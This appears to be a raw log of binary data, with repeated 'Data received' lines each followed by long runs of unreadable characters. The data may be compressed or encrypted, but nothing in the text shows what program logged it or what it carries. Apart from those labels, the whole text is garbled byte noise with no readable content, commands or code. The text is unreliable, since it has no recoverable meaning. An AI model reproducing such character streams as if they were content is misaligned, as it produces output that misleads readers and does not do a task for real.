bu¬Ñö3#¨ÂráH§g÷Lj†U¸N’Û¸?½â)JÛ_¼¿„ÿ Òç©syWz¨ ª@ë8>œe¥Ø<d-ÒLþ›O,Ì‹u6Mx™± 4ۃˆß‘ŽpcHS¨5ÖÆy£ÌhB ÌÊù Ty0c½Yÿ“)’8l"òÂQ³ù!Z»òpÏã~ó
Data received ‰ölx‰Êd-X"l<dÀZ¹6B0*KHƾaÉå)’·cEá„O„Ða籆¼E@ÛÚ+ß4Î÷
Data received ·¿³±ƒ]„û}³äu=A¨˜ò·k¨¹óÄO)М^ְ̳"ôKø¸Óøëf7Êe¸öîx©V£Ҏ}Ï쌅çÀ’–>¾ú·Ÿ_§IMzÀß2ò1ĚØÇ íd¶bJá왵f¦—ªL9­Ê_o± #zYÜe _5u î­¹X!ÎL”€iê'jW¶Áªú!'¯GA˜¾ÈøGžºZ²´q™ DÓ_HĂBͪ{ª#c3?ã+Qþý`Ê>àÄ)}ÁJ÷zÈtþïÇÿ.©'s’l êÞ\±ˆ·Ò¢n,Q-ø&ò‘mÈ1qŸbÏjr}ùˆ†Áhõ–pÂë›ÅpY´'‘OR‹­Ú"ýáY˜¼½ï©˜IYaE~ˆÓøœLxµšùkg•båÁTßnçêoÎî?ÈÉöRrË«]S¾f%üiˆóX¾‚Á+ó7ÌáH .ŒË'o°[z)ºNÙyš mC|Vk)œ& ÆÿÖøõŒûkµu²âècºa,ÖÒ%_K#úøð~¡VjK‡P vIFµÔb9ã-q>Ê< ?%–#WZ?é·M<TvÌV´—;ógÆ«ˆqÓXóˆNÙ?NÎ'i™/¿²'ûòîÈÿÐÿ”Qœ åñxÆ®¯?­tŒŽŸ™ÅLEVFK­§[ÎÖÔ¢ `Á¾ý«Rè‰{3Ä\Öüë&ǂMÂÙ^øt&ÔÜ sƃÍ3ÊFǝ"6AºVÙºZæê¼9­ŸÌ皘½¤råQˆb}|möÜ­…©J-[g>àû{!ÿÂã価šÆþv¾m§PBäfOiÇkàƒÛ=€ŒÑçÏ8•ÈGûGM†…‹±4Ó¼ßR奪8?/ÕG³Hñjn÷Óï|+bxÃwä.€¡o²ý¼l8MÛB88ÜC; ]JL˜)¾¹O­Ñö’¥œ™Y"ªôÌ<b:PÅ¥LŠØ@DÈ-“„©/(²[ŸÕi|[&Ãõ˜ ê^Ž¦b&C™R;ö#à ­þ4£…ëkèµ<(Ô c­njèÜ¡›í¾P!‡')]Nz×õ1¾½gä–WX¦Ø{˜0—ŠÉÌ2ký¡l99¡0ò¾=/>§²GՃULۂ%£|Ø°é°¹”°*:Ê$¿˜ñn{ÛŽ¼ªú©š#\¨3,Ëæ{üŒ¶u»^ÿ‰_^'·=Sys÷¶Hò2ëÛÛ·ÂO¼ub0¡R`|ð¬nÈ}{Mw´)AM:ƒ'Ë««¢àOê:×£QÂOç‰÷Š¨Š5NjœñKÏ|Ïó"ï _çMf #õÙ,S@®rȬÐï *ú:‡7ð|óììÃäÌ+J±#j¤ÇÈó¬7¬j&(sòÇÓ{ôúÇjÝy¹oF‹‚éSŒúP#'CoÛÐÀ6ÈRY]ñƒ%ܦ•\­åìqöš,Nàfb)UÍËÔD0‹W2››œlQ<F’¼Ø®›n¬&p8‚|µ}¨_(—¨v*ÓblaEÉ4Ïr¶wõ§È!éo9àLێ°ò°úkó•4HbEÍ›·ÏÒ¤cÿñX4ú*Œ²EN7JÙ¤û`µ÷:¹2â[ž0«âó ‡.'~³¬O÷b_¯#53$b|@ oÙ>‰-¢áëxÇGùäÆə¾mpS»3Àê/¤`{Z÷—Ù`EHXÊÑ¢*ˆüD,`“
Data received "GuùZ¹òç×þNHúñ“&wܹ;xŠùïÙ9÷¶ÕãҎB@ÃËÄ Ž ;JÇ/§u40É×r˜ÐÔQÉ™$ ×'—!¸$ X;yºxI!a)›üŝì¾.Æ£«YևV9ªHVºÌc<JÍ՛‚_lk؋„qשXoúïÜàò)^5y𠯪=µJÏ<Ћ…gaÍøG£ú›Ã´Ê Ín²}ý‰çXÜaßq|{ït= IÊ÷ž…ÎsÕãæ3T-†Åžü™>EQ͘ßÂë …ƒ:yF3¯l;¯ƒ*]çÓb;B xHTq@Íf6‡M Å+$y »LœÖ}†«jj‰ß +0 :ISšœAd5ìäý šavâjU× ·^˙s ²×ð@vJPs}ÂÌ@C¹s™}Hû»–äxrÅ«íO*Ðx|òe³p øۀõùLµ!:¤³2¥À‹á©äŠúùŒ£”Tku3{yx'™²™îNz§˜Í¡õ–Òâº^âl=ג÷_ì#çb õk{ ʘ¿¸.)KF›³*OÀ–äÐmŒ©¡ëFånˆ#¨X„å`ø·L˜ m·salÙb6ÛY…w£­ÆÖ9ÃØKJc{k3ڀ§ØX@ ár0b G W²k=<_LXx1zB%ñ­j¾3´£O`†\¡°!F#p ²{6|sÞ!f0©å¶Å«UK«W…T-û¶ÎøìI0ˈ­$7jã’!¡ló‡>HšÜùÄ(¸Í µ+ð¨ä d†à¹|. büQ™ÛÑKê¾W2]Óc¥œ$²>tá?Ž­ùæè¾,l£G†&È©³è>ÐÄeCbäÕç‹wÞÖp€¾èHÚ§k|À Í=2 K¶…#”Ðùb¢ ÄÏþ:d/ákv g+§ÏÞÖdϔÚoü=:- ÉÉC&i=Õë,½GëÊÔ¿¸Ý;\½0Ãöh¶X‰m‹X·P/Sš:œ¹»Î”ߘWíé….£\㉫14J ²>[ŠIÝÆË =CmÅ͔ã\ÄùËí“÷@/Ë®i#ì•ð¯É·:Sp¬+YÝËøû'ß"¯`Lqër¦'Ï{É2D”$½¬åÑ]:Ú!y1{¤ÿ³§º«=ûÏ¢<suc>¬ WÃz80Eé¡7‡EhŸžp% Æç)WÒ`sN•×š[@jòzÍ" ãÐÌb1å6k7² ÞÉU‹Fð†Ñšhè,èÏ­è1…RmS⣚LUØ0JE½f×C{ôôŸùÃ—ÆÕ£ç®5_(DÜí°«±\<…ñx‘™—¥…þË»€žK)’œ0p#uÿß’ªl´?µ]æÕ$iCX-YÇ«ô”¬é \àRðŠ+g-‘;y(pv$[ª}I€¦½{’ BçŸó/G5•@У%¹È»øóæÄÃ!É¥Ý~|F„=þߓíÁ3Ÿõ 4d¯6©µ©––ª¸¥y÷ËÉޙ›HŒVõ1ÊÙ9Ù«x~'21_ÛÁ¨ÐðƒËrVöÙI‹âüäCnW´ÄŒ—ê*‡—ÄÌX͝¥–]2ú•$q¤d/€E•'Å«½V[„ñ!¨ôT¥ãÇøZ‡qº@¶ŽïdÁ²¿”%g×EÃ^‡â“ÑAõQ’Õ-Ûn鳧™óEõWFcaÐ@Unø*‚‰Ì&·“c ´2D1x\Ž4PbžY(NŽ8ŠZ£nÀ’#”Ë»èˆØüÄzˆìÏI.YVVu,ÐEu£?IÀyz.*Œrڗñh8ë†.vÞވ…•0¨¶Æµî¿ÐÓ‘"*
Data received „hÈÔ_à 2&;¿YR3Ü»ª¾fuñ:µf+oæTÝw‡æޅ)f!?ñ´ì'ìö‹]äƁºyžse<8‹äGо%I¬Vµð£Äc\çŒóa™z˜þtcڔ˜œ, WÈzW†Ýs/—&vÂÅ<Xà°<âHP­‹ƒ”%Y@~D;råA…¾©%ۊ´ó‰W°z…Šõý(º ÆéDl“Šsë®3ÇRý±UÃÚ?©/Ai8®c¬ðҞ§³ÆŽóÇð×d±»ø ˜+¿…÷üÅU?C²®}\hÉ"ƤJº5ã͌Öñ®ØGë™ÄÂE72˜ûχ†"¢9Jâü­©FÄ Þã€/?ö€?GóՎd-£$4ÐĪ_v¡©ßO»FqÈío_À]Éô;†j·ŒaŸÔb® ü…¢Äßø!¥­EÌhu³u‚Êç‘ %µëø UoË6D%V ôƒ™°wû»ÕûîWBr€MOÚ~÷ï!¹ÝLwO&·rïTÑ/òP”YŸ‰çÆrmuyPÿÿ¸tØ Iý^nÎ%QË«ÃZ ‘pžš5Øz ú˜¯VĹC y8ó[ Ã`‚/Sª/xŠ¬  ç{Îör—ZWBjÇÔI”ùŠs±/«¦T$¡¡YéÌÄh™oªWÄáTÚãeî'I$I4ÕZÏÂ-aWpm</v}Œ#Uå?To‰®Ÿp#Šäv‹4~)÷göŸe$ôËS’CÑdÅ2}uöVåd 5Ïk…Cªú‘‘½Dvë+5SäxÑ&68/—½/Ò¾«¾ì9^ªUg¯YæáD#eõS^4çS)0AdýìRD;?IÚLOI冓x»>þ„DÂОQ®ê`OwâòfòÝ !±Ô#û’0öáqà £–/Òîß|éxšÇ®ñɵF7»µژ""ßÖÖx0Š£1oq¼u.¡qºïæÌ#×Cø*î@E«°U¯ËK^³p€ÆÉJnyüD˜õ¹ŒPWÆÿ×¹J¯CIÄÏõ¨/Ú@ÃÓé òR¶_Çh•Í}ž9\¬²"]œ7\´œ½Ì‹óçÎ p¡Ù‡Ô7íéȾ)9a"÷±ç爬3í,ýk: _{CÃÖÉÕ¶ô4p[pƒUº•!@ëÙ pñWë$;ôÇÄùSŠÓR:kžš <‘6ɸ 68·ÔC†Z[`F䈇™'ð•ã“l/`Ih×'QPy@Ÿš©¯ä£ ' z"T7îœV³_CCXùym¤ƒ˜Ø<gý/†£Ûµ”o‡¾Ñ|~D ó²x8JÓj>Eý¸A„a"-3Ö@ {‡»®èxŽ¿þW_æ¾új?[¯!P¸ÿç–1V0å3ä£ß%XÕ$b\”€{‰±m±½Ê pÔtlkJ¢|õXÉ7ÍaÅËøRlbâ8kÃ?ܟµ‹2f2~™RŒ¸qóèPxôr…*²I í˜CßåZ¡9r’qˆe ¹Ï0d²U²`tX¨r¤ŠD^;Õ%Se7t›‰Þ´‰ok¸6߅ë9cù ùâ‘‘hV¾0Ý°l™è«±»%!»ú¸Z‹ØÖ 2`†'M˜þMnh$~S¼˜$<°%IÈD°×„psP¦qxÏQFIo#ã vÑý ± ”¿˖6zDµò3g˜ Ó³• å–Àè@nR´¨+gðxô«ÄEG#:VÔdǯûؔZ¨ê\iï4„3Aí™—;º[‚þ—4¾sYˆéÏFÿæÈÕ}ö
Data received ˜”]»Ãí–nXør ¢To½“‡ D4Ö s}›Ìe^ÏkOÛ À^ %(>×aR°\àÍ¥»ê"AÃdÿ7._ËüEÿ¤xš‡ ÇS¸Ïÿ“ 9íô$ŠEnx¨Úç51ˆGðMÀöÏ<WÒûÈõJÃ4 äé~Î
Data received "7Îivƒqêqñrr'–ô CP•çän¸¸mëÉpĉä;EÖÑ_¤Nöæìÿœ$þ‚€‚jB~qÏ|—¸¶B–½»\ýÒҍ]÷çœDµ=£Òïn"Q•¹³ÃÌ?™²™æZø”Oæ9Ê=7ÿ¯2Êíò/ïw¶pî7sÀ ˜35¼àúºÆÆeª´·šÂÎaÅÈû‘¼-^ûÇÁB^&“ÿÝ0º ”À^+U|àÕ,í#‘Äĺœ·¹ÝÉöq'Laép‡=ŽE¹…(õ„¼ŸÝµSù%:'ۍþ°Ù?ðª/7UnéG\ŀyV̦8žü~½Ù]óæD%÷‘¬‹±Qi-Zf^ŽžÓš´–g}"¹DŒBz[7‰#/Ä"*᨝:näå£öó; ŠYs?%>åhãÞ~B0Qʝ›þ õ £™‘)P!ŸÃÀ¹˜Ô%Zöã4,ú*͵¸'ôÙ¡JV›<9>`^콊‰àgDüR'êMžs‡¯Ìî>ÏXí¹O¿)÷6½¦¦ŒW<ô~ÛÕãºGÖ¡Q{µC¨'ýÕwzµ´^Ÿ=JÞ}˜¥o‘áp7,´²²…;#«*àñÂVŒŠ,9É«Ⱥw­Ã‘kÀž•Å„ƒú‡x&fÔX8ٓxß¿ÍmHÄ£3ñDå•ÌOn®pÅô5®ÙšÄL‘]j¨^}¬}‘q/ÝÇͭÝF´*Y×Ùõ‘´Û¨†Q+V)UV@í­cÔG}~Âc‹S/ 4cN¬Zîš34½iþNCË®°fñ'î0ýÃm·,½k#Jî¶@gå·»JÕ]¤ ú“™Ø\=ØÄ2+~šÞicÀX@)£¤"–$2G7Ö){A†ç?»ž³jo¯Ù ·R”¯ÀÃýæÞ±­’º2[aRÏäÔ¨H*Ï4jÑâ}è«!r3j|/ƒaB–™qô,Ý&\# ­”¿£öi€´NOµ¾±u¨1º5“·gËb_;Àý4{ LœL `Ñù¶ÈÿlÁ¹‡UÕ›§›bI¼ ap.:´]â´ïǾñ·€ÞRÇ­Ý %>Ð$DZž-™9ºúQŒõŽpEăIµ<sõÍ ?Æ1µRÌZx°2OºDE¯­œ×5=³Í¥ W¦Í@ý µ‡ÔŸ.ŸË¾:=¥šiQtÐÜ?4É{ï>)b&¦£.UÏ꧹ìc-gEFn¾üw⠈‚Nùð¢ H6<b(š™1ϱ«g0¡“fb;ÞfæK¾Á—¢"2aÒ Ñx¤J…³ëï™ËÓÄ_Ymk³ÉæÇv3ÈÇÿº¥c¦¡'íNžaٌ)Üú)™?qÔÇ°‘^µìõ†®‚}T½,h¯ñßÕKf~å›:É0&f¾|â§f µÖº´]±íxñµH–ŒŽ¶œ¹ß<O—M×Ü?wq>«fj6xO‚ª©L˚ޠ}b#8ÝÔF…Ö«1[›MúiZŠ'¿NÚw„¹w=şµqà¾ÉqÇu™CF:~\âB០‡ˆrUÑðŒçúÀžç†ß ñuN,ÄíAwøŒm/¶‚CUgN¬ô-7‡5ÚÈAR X¬à@
Data received ª$珷>Xž¯rj'ò>á-…˜NIÃB#T90ší(˜–͆aK’ç¯×Ÿ:¬brW·ùB©+øËÐ} ö²úÒ°F©(ËV7ñk#ãð·‰-2E‘:ƍʍpx»ùØ¡¤º UäÏ&ðñÎ"ªñ€ãQ<'wí”®ÑÓi¯ˆÌÃÿÙ«¢4Ø£äæõ*·:51©4ôåª$„õÍ|(¥ûŒ[᧮QñlPËS䐕À­6if¦d3¶ñ#F,œó–›{H ‰.‡¿¹NÛndphhè¬Öy:ãªO ¢©3ó{fãBjÖ®âNìuu®§}èÃÁ3Ñ|ˆóDSi0Y«ÜV¢‚ ßŒ ? ٜԞæ‚ÌKR#Ðrœ†}:&à€j™P£WFÒ|ýn•Âœ5¿ÓQr¿Ñ‚ J"+ £ è“~„§ØÌDh1-„– –šŠdÏ MnB n»zo¯”×€ðÑ·tW×AѬŸ©3> 19¾ûŸw°‚À(_ûf¹icŸ`@MájÓ°e!0@*·<U ¾d³DÒ;Úޗ¶/ìèÆu+ç²!|Çz±¢põB=3Ό¡L‘UÞ%Æiä:ûV‰ü# mjëöA'Ôl.9'Œ‰„¤lÝãªÌ¶¥_7ðµhBN>þ˜3¯‹Òʌ–,ƒÎƒÒK4àO]QÎ×ïÛ|¾ÑM+¡Î$åuØS³K=³<1»P)¾Ú*8ïK2t¹‘hŠ0îCEÁ+y1¬‹;„ˆQ@ æҿǧ.ø¨’I£9´Ô¹5‘§áEúÏJ͊ݤ?ÏnjY.×ÒJŽ…Sr!´(¦çmÝwù•S‚°9ùˆÖ_ÉÞÞC;áåKüiśß­š[ßÁl1µa¦úºz¡– Ä 4'Àâo÷Üîù%\ÉÄï™Ò'ßWl?~¿K_ð.,“ä¨&§µè,ò…˜•…szŸ•ÇɀFBŒÏېd„µC ëÉÿ!t4w-¼RÎcª5¡ %…kiL¨ÜivæÃʪä[Z9ÓóOÇ*©”ÈxD¶ŸIöÞ¸:WÞy+*bx mKÔT%BLød÷*ÌÀFŒˆRºØO&Ò<ŽjxFvª«l¤T÷²‰9ø‚Ô–é’ >´G¦+mÿ⒬<¬ÔÃÛ |Ÿí'¾pocK'¼‘_"­Ö˜N€Ó7Žd2÷ü'À Ŭ!ÓvT+Z¶7ŽÃd0S›s•¯³-!‰åßEã!Üõ  X„ŸVà‚Tì™Þ€çdTëoÕô¤QW¢Ó¸È±ˆl`ø‹xb8Ñ ‰7gÃR’Ñ=P’†ào¥ÓèR›/çû%q}÷E [¼ûåžià<Ïמºõyèö Ú¡¤Fñôh¼ŽI“•§-‹ÔlŠÈ±†Àƒd¡DaRk&"7²ëGI Ò*,$HÄǼòaÚæÛﲡ’m½@àø[ Ûûp$=ÅõƇ\ÓSª=è¦$ M8{6­9›ß>™3 5:ÜnîÉèÚvÉÛæAGà_MLžuˆN:ÅMt™ÑѽßàXí:Ãá¢%ð¾wv#¦c$ûÞ©j„“QËûR³btøü)ùXt›ÌK=Cz|¡3ú4 ùˆ”cæ0H µ.ºg¾#ÕlÄòëè†làØí¦#¥\DŒéKr\Œÿsq*n‡©{Щ@‹ˆ—ŸÇԄBÏcˆQ@[úÿ hٞó«À vÈ·`ÜÆþ‰]m83¬ÓŬ~"î"²ü<`ü‰Dórež)<Eu#"q¸Ò@ïó"|nµ>ÅáÖMÖZXò
Data received w®÷z8—ÄãèåS`p¾]©1É Üu¿N“YLcÿ8)ø>‡sÚÆ/ø ”Ò¢óŠ2úÛwÐF€JY¤Ùv!-‹Åm’æÅñêL`xPÒþR•møçl.#Osó.qéÐÏlÿ´3xÑ0l!ÊM'G †ižÇð0ˆ7x!ñô÷ÞÈ|ÕÓNŽ^3€ŸÚ;ÉD#€Õß9!@yÕݜ‰;œ‘×$]Î$žiñò¿°¯ü{Åekdy•¢\÷y'!ƒƒuåCP-”Ûco>Cw€”L2ó Ã1tþ•âcêíQ;0àG%ß»-Tj“ódòñIT›–
Data received ÷3ŽaNFº¤ Zÿú]9ÍdGƒ ÝÖþþµãXˆ±ñ8Ùþ1¨ZƒVÙ£F!Tx—0îjT0#w¤ \SIöÚ”LÖ`Úu±4&•Mj øRh"½úí¼w!õSbŽÀY§¯‚òYK­°c½ô=×p߶ó<¹ã—Ðÿƒ˜¶¦Ì‰D¨ŠW£1ƒb ù2T;åm?š… ÀÈUŸíḋ+Ë¥[¨ñ4‡ßÍ @øh÷áaþî[ë×-¡È 0àA(/[âºïðºIÜÒ´»Jš uîög ;‹Ajšc ¦ Ø<ÂGp<˖‹»®_G `µ6 Yÿ Ïã¨þR±v¹wpÈhDÊð¹*'@Ïi`d† oð_1eP <¶3¯8ï"‰ÏorI8L1£¥´ÍÁ GyڃBU#…·(¼œÝCU´¿PV˜5›@GZéOñ™™Òêp¸Ú‡®;†LÉ3Êßc°µ#F³ð̾=%sç·Xl¾¿£_P쨞o-f›Œ×ôº  ÇÌÑEu™Y ¤¹6«ŸÎªÖ3Õ&9õå¶K$7ƒµOMÀ>;œEaž3… —;„ìDðxT©be6©û@-=¨˜+&«½ƒ®BGF¬©O¤y«S9¹¶yÃ6hȕ˜C¹ctöndz n”S>¤H³N¤iO&jÀI؝M8‹5¦„„9t8Ÿ?*¥E祷®Ãêjÿ(:eF_Rƒ½†¥u~Æs°»ðèƒEŠ;+û^i?œþ ™¸2WVý2ôcòՒ×á£Q5wúÙ‡õKƒÑð1Hàu¬«€†­ *Iû­Au'[ó#3…r²°q4´nEöÈA¸I3©А­Æ}ŸŒë¥ÅŒzïuÄ®‹u5€é ¾Q‘Œ® Íõª…T 3M ²y Õl­¢ÑgûA†Ä* të|[[áN­huO[i6 Á6oùÎ6’À<‚}³=Ûnú²à°€ºO—«s|†Åè¼Kÿ傥mº\Mî!¢†VÏ]K¿è,±ªš§q\ÿÏØîöJJÀr„ã¹ÿK§í¢]_̗¾Ø±jðÏYŸU(¼ÖV߮΁¼ŒÎ¿¹Œw×|/gçn»«˜aª±éc'^?zYRÂ^ÍdmúÆLUÌ 9q^[:ƒ!;”®!45ú²ôèkÄÓñ&]#âsø—Ú´2'mÓ0«úæÙÖ|¶/R H«r`h/6«¯À@@°¶œê‹4erޘpŽí†åäIí6Xxyô~3Hé4ð?v"–«-y2oM¦.Nѹ¢ÑóÐË\ÉT"1µ€b<xSè`¢’†[BN¤I]Ìú¯q­ý˜áÒ±^niÍ;ãÏÒ (ñœLf®ÈÛÛ|Ьϋ²ƒÒ;è_G œªWi‘[ ›¢¦F*àŒE“+œ“6ä.ÓÛnï¾R§&ö𪳠EóU3À¿Ã‹§~3´‰Õ"ð¨pÃv`Æ2ê`Å
Data received k—„7¨G§N»‡_ÝQBñË[¦z’·Øÿ>°Ó>íŸã0î½‰©Ýf“Ϗz—ËdÅó¡8Ö­òŠ'-^Yý’çp! }b«B=ÁKÉo›>ºáƒžJ2ÂÊ=o¤ ÀŒuÔþŒ§Â„.˜k yÉ@3ð¡UàuÒG„Ú³…sûò`Àžîk£ó[ÌåÂy7‹cΡ½£‰W3G 4'î9¶Î2Á&Çv5€, c(KO‹½d3P+;8Őº/Æ>öɏeƜomº·ÚÊN!@ÄM¯Ðzãá ÁÚªK%æÐIÇ´óÁÍՊæq¸&3 fÚE½3tbÅÑ°ˆ~á4ٝ4]£{C …º#{¬›†sӍ7)®¬l®µÚ®ˆ=„èâªø­GXÃm‚0¿j*¼â±Ó©"¤c¨zzåUxFó”fßôCÏí!° ^Þäó8¿rº½f+ìb¥!‚0Fá.íV5~šÊב©ÕIãÇg‹x«‚Dóðv¸óSßL ™ÖHK¸‡éåkê÷ŒC™³_!úŽØÕéó Ô«p_—ÕTîsW Êr]”"JÛ¤¬M<×Ïë݄xÁèiŽ+Š‰|h\’¨>Ël ààIôëwãkד±¥¿rÇRÊAA,>›uH“Šuu!Ù"¶ÅfXýŒ ñƆn÷®cïH“Ù‚©ß˜ñº›‰Å¢í ùBd¶^Ùa-T=F—%ö›ÃþDԝb×tÑϛB$ßÚ-Á,îUCrÝÜ¥ª†~íÑ!z+Q%Kzêµo œÈ.YOýO÷è'}ß"ß×,JPYîó©fú|5È·=w¾G*z'£éÕ̪ºÂ<ð>ÝCî![ÎKƒÇuÈ„TW˜‹Aì´¬±¤9X”¦‡¾^ï_Œ%ÑûŒ¥ ú‰éÏ ùûb­f}ÇÌHÔùS¯¬½§àÍå$,(û&…3 ëÛT—èÃë[¯?‹8q¥‹tµrµRßPB¨Á¸¡_}®…‰‡ÛÖ6g'!NDH Sœ€jÔccÉÒRÿê7!Æ¡ï66qÜìÿÍd¹, êF}œÕWP#Pø¡LoÊß0ÅÔ­ÌÂòs•¤ß‘{ÍR¼™XŒGt6¬ÔwÖÇ)vt@®56 °æ0ó³qµAÛo$è+w‹·ÜG#æƒÑYeŽ6_Hÿ?úÊ4š!°ž-¸· õ‡_rÒ̝!ž—à «ù*°G²ÏÏ«ß·°5’™»,móÕÜqÕ¢”–À*ìk” ©3Õ¼¶ÝûiÍJîÈü™›Âz° ¿:¢d÷ßáÆ|Æì–F„³™„¹š,Fʟ ò*)T¡Þ@®Á+¡fÇtOa·Oú…$=Ó!Ò}CÑuGÚ|*sçH,„â|v”‹Ù®‘« Ó˜^® ~”mÜ>™Ï<Yj}¿àÑMÞ.ôðéªytwnr k|Տï¦BRïŠD»`“ñl!î¨åúºzouېž;ú£ö%LÈ4Íf!Ž§M ÖÈÃeRZ’ï9£)Q0û aæA݈îÜD÷X鮖¦3²7Ñƽê¥cH·—ž·ÈhGř”Óü”½pfZ¶äž?ýmQ _&¦ü3dŠdŠÂ# 8éZ¥>˜“T AuÁUž+îÛ hý¨g€ÍŸ"ýFÏÿ Ðߒú^z{Îçæý™?¿ú<RÌLÈRe3Caç½ÖþF&\­‘âHœI?(°@ÍÀ¶Ÿ»Ãö¼B‹¶°NSšÍÃœöÚ×Q§8; ]›\®DŠ‰H!½D9.©íà · ]í|‘¤›V
Data received ‰™z—žA‰,ªøßÉ>ÙÕ«G"&›ôÂþÍøUž#ã)H³UfçrÀÇI¾É½Çãý?ÀÕš^3–­õÿñú¬ð;x,Æ7ϺӔz°«¾= ) ’-ö@™“A÷…±nÁD%P¥Vh¬Nÿöÿžöh±ƒæ“Eó†½í}ów̦x¸’z+ )YÊo4mÅ(ºãx=‚ÓXiIKv–w=$I–Uäâîñã44ÀYRX•¡NÛ®,´ í5TÜ1K~-³ÕJ¡Xɕ?5:ù¥Ü™NÚj–à/lz!Xv[P äô˜°Pþÿ‡É{z¢±±?Ì¬Ò œéñËù(xðŒÐ*›i'>^_0ÀºóŸgs¥V8ÅÃ`u•J˜Íò\Rcï»Eq#5&öË4á Èy<’ÓÎTF«ôÕÅIB=CåZIýš€—” ]²Ò†¿o Gpðϓ˜»²
Data received ƒ¡´Õ…´v¿5ø\Ï\`!n=Õѵ2xÑ%‹Ž+ä¼mùñ=ÿº%¾Ú‰³æך_„%e„(_h䃪™‰¿@Ž¬PŠð¯ ›Ú¾!ýSájûiþ ˆ¯ù#!yÂÙÐߊ™yç|Û/dŒ½|µ@»p«*z¤4àëë³Npm*d´íâhV´èí"dß"&í¾ {hÎÆ ŠçµµáØlQZê ׬ǖéËâÓé(Tÿá“2ŠèÎÆ?ôyH࿞Ÿz¯Á[!Ç´»‚ÇˉºÉÃ]óUUxɵG"H˜Th#§{ÀÑ{ŠP•ij-a*Ϧ‡úÙfY„Öc¯Óeþ¢£Å'wÛzä–ö¬B+%B?Û³VëùÖ±~Á›nmÔNŸW‰çiø”I!q]F‚ÒùåÚ×{‹ý>›£Ó$IJ+ÕJõ1ê@D-_U°ÞÆü×p£»êŽ•Ñû ¼rW±D¡»¬û ÒJiö«ëKû rF· ¢/μ¼lfŸ(àÿ‹¤ºPþÞÓÍTç™!,ˆ™‡r¡=w;·$O¦<y¡åú*[€%Â{q9֐>͊¯5æ{÷ »Ï¯å†²©­øµL>×%LLZ©ÇÏÁþÔÑ@˜MNþ¹HàØádËrì¹<JÜù¹’Í^Ø,'>ab| ¨?C7Ö¡a/²ÔîZÇ+m@°/ÑcäÎ~¨s؊æ1@ЯÈëŠÍ1Øß¼4<ÏÃÀ֙&®‚Ê˵šëƒo@QséµYЌàìÏYDC-k(¸êð¾°)B }G–£´ÎñÌ¢'¡Î‹„=îc` ¥çòîlSV,X¦âq¼A“øÊûcÜF¿¼÷—# Ã@Òê3(bf±I«‘Øð!±?òÎÆðq‹v9t[£Ó·©$5)¤ª”>º 0  ±¥.¾—ùŸôíIçí„íCO»{w…~Cž·ßmF{Ú+’r{S —Øç“ÿšðê˜×Üù ™!ZF?_ú´”´jŽ¬G•¦©Ôiœ5»†Å‘“6ÓJXké1€Ž߅G€ÃvF÷DxØõ [¾/P<-y:!žFÛùDvhµÇX¶ÈË©ñ%…/—˜O•³ê†fï‚ù†²Ÿ½ÅoRÑ*3 Ì¼ÜS“áGY¾ù»×ÿÅþ?mI¢ç21 ×!nJe]KÐçár°p ƒ¢:ÖQìL¤¡vU‚ë½ãŸ÷œ/ç0h{…›¯ØP ´x2€y—ĺÖk6IO¡ÆxKÖÂìOXÒé gz0­Š>ÃlN<àÚ7¼ƒ®@[Pã‰æ9,ðËl0×Wy“ ôƒZµÈ
Data received 4ƒ<s§C™y¨<§¿,£VìžqJOƒ¹Ûçâ4)RþždÞȹx.ʓ ð€»=)PyÏرè 7‘m¯ ÃfwƒlF9õ3ϐ¨3›­a”§—ïEõ·³öÔCk%ï¶áuY(×3ÔU½+G¢Í0èxɺJ„~ôuD—>‘ÂyYÊkCû|’úVQa‡TôÍ_?æ}(xl$â2Óèúr€ƒˆ.™™æíæAš'Ÿ=ÚNÛf0n¾R±’™pPõø¢7ÃâO"÷nVùræw Ì⣰S*Q¾ 7‡¨‰:’¥bÌԈ÷†C¤®|p­ù†X8Ÿ X ԟäl)ö›êHyÿodˆVw÷q´ÎŒÅê¢W"Qçv[?]Iq{ããõ›yV;‰ÞWì!ºWk·~RÊq9ýð•I¹x@ g*Ÿ­¡òÀ‹¦RŠ2¹<åöà Eë¢)þ>¼–«qð¯=q#L–ÿ"S`x<´?ç^ ñ[<AŸ;ÍP14õ R #»CÌ;f–ɯv‹,R“¯¡Þ3¢}XÓx礅9g_(˜ëOv’ìVÇC=“Ô)\(üžï‚“uŠf~ÄÒáK½WÖUð ðg։«c¬7ŒðÃß·|Þ°¼î)‹ïR†*«"YÆÀ×ä=‚&4§#À®V¢úñÎx_…ô@ŠÁ<.š— w1è…0r»„’=#"^ÇqxCPƒ[ç!Ô)Ûì78am=éîxÊŠ€‹.ÈvFL çPíU2"›n¼œ³Yã¾,E‚Jðî[>ʈ¦ãŒ[䥢™&èó¥ëL¤Äœ)C?–£ExÕ@Z“Èrþ£ tŽËúÍ?ž/íŝ°ÑYÙã¨Ëë‡f³(rþíhdTèkx&ם?CŽoŽ v½Å[â7º#U&®}¾Taöߎ_T+Ú×B0¢º1‘f¿ÆøHb`Åå´6]v¦µ8 Œìb5cxÕLW»Î¢>îíÆ5ëºúÁ†Ë%2Í_Gî‹´È(è=ïð~W?b#Ìܜ˜ ªP¬^h’GžáÓø‡´ÜEIØe°L´ ¦©IŠ^nÁÛõ——nD> Þp³\Zaۛ?HŠ•l}ÀBõ%t¦ME¨¸üµH#«×‡EÄßjK´E0§å|vmîJS.<–Ô ×NJYÕL!ðýŸe¹"ˆ®KyÙùÍ^žïÙ'j Š¡»= ]o©û05q2Vy7¬vJ{p{Ïeàºà«`h´ý˜ŠÔá$:×½(¹„^U¼/Èh¥{©?w˜³kg믔˜ä ¥\¿žÔ鱏8ÙèIJ“È9 -Ša=µVS‚¯uòŽ 6-µ`ì֓ «ØäÐûê"0ºDÂ[ÓüÞ\ýaØ(=hæ¯Q*ÃE;PG—Á§Û÷ÀÌ–ý—bÖAú~:>kâáL ÂO|*°a»ž]+WúúKìëéÈ«Ñhä;׋BàÌ~ªYӀɟQ^Ãfm™÷o/ s}ý:öŸší6´Bl"?³?Zš‹|aÃÜÙN·¤BPÖW°:âÃti¤u{«Å:»Lx(±@­?9Þ[+/%Ïs ëáJÒ1]_"á#@TÅý*“åèÿ¬ñ{öÍiJ0Õöî(æÝ@…IlÐa ¬¢‚kMÑww¥ðßçÜ_¥ÏǺè䌆ÍՑö‰žÝÔKÄ=i dò逷ü)ï >ЉçʴѦb¥»g£O¾<Gk†ÌêL+ýÖ¬)RGNÝù`õ}öPsZ;³imނ1»½ÛÈ8h'2}lH?§Q
